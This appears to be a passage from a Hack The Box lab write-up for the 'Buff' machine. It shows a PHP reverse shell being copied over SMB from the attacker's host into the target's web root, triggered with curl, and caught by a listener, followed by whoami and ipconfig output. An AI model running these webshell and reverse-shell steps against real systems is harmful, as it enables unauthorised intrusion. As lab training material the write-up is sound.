Shell Upgrade
c:\xampp\htdocs\gym\upload> copy \\10.10.14.11\smb\shell.php ..\shell.php
�PNG
�
1 file(s) copied.
Placing a PHP reverse shell at the web root over SMB
Delivery complete
┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ curl http://10.10.10.198:8080/shell.php
Triggering the backdoor
┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.198] 49775
socket: Shell has connected! PID: 9028
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\xampp\htdocs\gym> whoami
buff\shaun
c:\xampp\htdocs\gym> hostname
BUFF
c:\xampp\htdocs\gym> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::23b
ipv6 address. . . . . . . . . . . : dead:beef::e98a:2472:1538:99c6
temporary ipv6 address. . . . . . : dead:beef::e531:24da:e024:53e7
link-local ipv6 address . . . . . : fe80::e98a:2472:1538:99c6%10
ipv4 address. . . . . . . . . . . : 10.10.10.198
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%10
10.10.10.2
Initial Foothold established to the target system as the shaun
user